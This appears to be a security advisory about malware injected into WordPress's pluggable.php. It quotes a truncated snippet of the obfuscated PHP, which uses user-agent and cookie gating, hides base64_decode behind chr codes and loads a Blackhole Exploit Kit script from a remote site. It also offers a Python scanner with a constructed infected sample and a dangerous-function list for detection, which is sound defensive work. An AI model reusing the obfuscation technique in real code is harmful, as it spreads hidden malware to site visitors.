Malware Targeting WordPress Pluggable.php
One of WordPress' core files, /wp-includes/pluggable.php, is being used as a host for a malware payload, according to the security company Sucuri LLC. This is not a vulnerability in WordPress' own code; rather, the following malicious code is being inserted into pluggable.php on already-compromised sites.
$__name = "RANDOMMD5";
if(1>0 AND !preg_match("#(Firefox.3)|(opera)|(chrome)|..(wget)|(yahoo)|(yandex)#i",
$_SERVER["HTTP_USER_AGENT"]) AND empty ($_COOKIE[$__name])) {
error_reporting(0);
$date = date("D, j M Y 00:00:00", time()+60*60*24*30);
$cookie = time().".".rand(1111111, 9999999);
echo "<script type=\"text/javascript\">document.cookie = \"".$__name."=\"+escape('".$cookie."')+\"; expires=".$date."; path=/\";";
$__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100 101 99 111 100 101")));
echo $__f("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmluc..
The injected code only fires for visitors whose browser is not a crawler or one of the excluded user agents, and who do not already carry the tracking cookie, so each visitor is served the payload once. The decimal character list decodes to base64_decode, which is then called on the base64 string to emit an obfuscated script tag. Once that script runs, it attempts to load further exploit code from a remote site under the .co.tv domain, from which the Blackhole Exploit Kit is used to exploit the visitor.
It is unclear at this point how the code is being inserted.
To make sure your WordPress site has not been infected with this malicious code, check your /wp-includes/pluggable.php file at around line 810. You can also use Sucuri's SiteCheck scanner to help find this and other malicious code.
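As an added example (not Sucuri's scanner or code from the post), the following Python script looks for the two tell-tale traits of the injected code quoted above: the implode/array_map("chr")/explode trick that assembles a function name such as base64_decode from decimal codes at runtime, and the user-agent plus cookie gating that hides the payload from crawlers and repeat visitors. The two PHP fragments it scans are constructed inline so it runs offline; the infected one is modelled on the snippet in the post, with a shortened base64 string. Point it at a real /wp-includes/pluggable.php via the command line to check a site.

```python
import re
import sys

# Constructed sample modelled on the injected code quoted in the post
# (base64 payload shortened). Not a real file from a compromised site.
SAMPLE_INFECTED = r'''
<?php
$__name = "RANDOMMD5";
if(1>0 AND !preg_match("#(Firefox.3)|(opera)|(chrome)|(wget)|(yahoo)|(yandex)#i",
$_SERVER["HTTP_USER_AGENT"]) AND empty ($_COOKIE[$__name])) {
error_reporting(0);
$__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100 101 99 111 100 101")));
echo $__f("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg==");
}
'''

# Constructed clean sample in the style of pluggable.php's pluggable functions.
SAMPLE_CLEAN = r'''
<?php
if ( ! function_exists( 'wp_set_current_user' ) ) :
function wp_set_current_user( $id, $name = '' ) { return $id; }
endif;
'''

# implode("", array_map("chr", explode(" ", "98 97 ..."))) builds a string
# from decimal character codes so the function name never appears literally.
CHR_LIST_RE = re.compile(
    r'implode\(\s*""\s*,\s*array_map\(\s*"chr"\s*,\s*explode\(\s*" "\s*,\s*"([0-9 ]+)"\s*\)\s*\)\s*\)'
)

# Gating on the visitor's user agent: the regex body is whatever sits between
# the "#...#i" delimiters, then $_SERVER["HTTP_USER_AGENT"] is the subject.
UA_GATE_RE = re.compile(
    r'preg_match\(\s*"#[^"]*#i"\s*,\s*\$_SERVER\["HTTP_USER_AGENT"\]', re.S
)

# Serve-once behaviour: only act when the marker cookie is absent.
COOKIE_GATE_RE = re.compile(r'empty\s*\(\s*\$_COOKIE\[')

# Function names attackers commonly hide behind the chr trick.
DANGEROUS = {"base64_decode", "eval", "gzinflate", "str_rot13", "assert", "create_function"}


def decode_chr_list(codes: str) -> str:
    """Turn '98 97 115 ...' into the string PHP's chr()/implode would produce."""
    return "".join(chr(int(c)) for c in codes.split())


def scan_php(source: str) -> list:
    """Return a list of findings for one PHP source text (empty if nothing matched)."""
    findings = []
    for m in CHR_LIST_RE.finditer(source):
        decoded = decode_chr_list(m.group(1))
        if decoded in DANGEROUS:
            findings.append(f"obfuscated call to {decoded}")
    if UA_GATE_RE.search(source):
        findings.append("user-agent gating on crawlers/bots")
    if COOKIE_GATE_RE.search(source):
        findings.append("serve-once cookie check")
    return findings


def scan_file(path: str) -> list:
    """Scan a file on disk, e.g. /wp-includes/pluggable.php."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_php(fh.read())


if __name__ == "__main__":
    targets = sys.argv[1:]
    if not targets:
        # No paths given: demonstrate on the constructed samples.
        print("infected sample:", scan_php(SAMPLE_INFECTED))
        print("clean sample:   ", scan_php(SAMPLE_CLEAN))
    for path in targets:
        hits = scan_file(path)
        print(f"{path}: {'SUSPICIOUS ' + ', '.join(hits) if hits else 'no indicators'}")
```

A clean pluggable.php will not contain the chr-list idiom at all, so any hit from CHR_LIST_RE is worth a manual look even if the decoded name is not in the DANGEROUS set; the user-agent and cookie checks on their own are weaker signals and are reported separately so they can be weighed against the file's normal content.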
And be sure to read Sucuri's post on how the malicious code works.
See Also:
Website Malware Removal – Blackhole Exploit
Understanding Conditional Malware – IP Centric Variation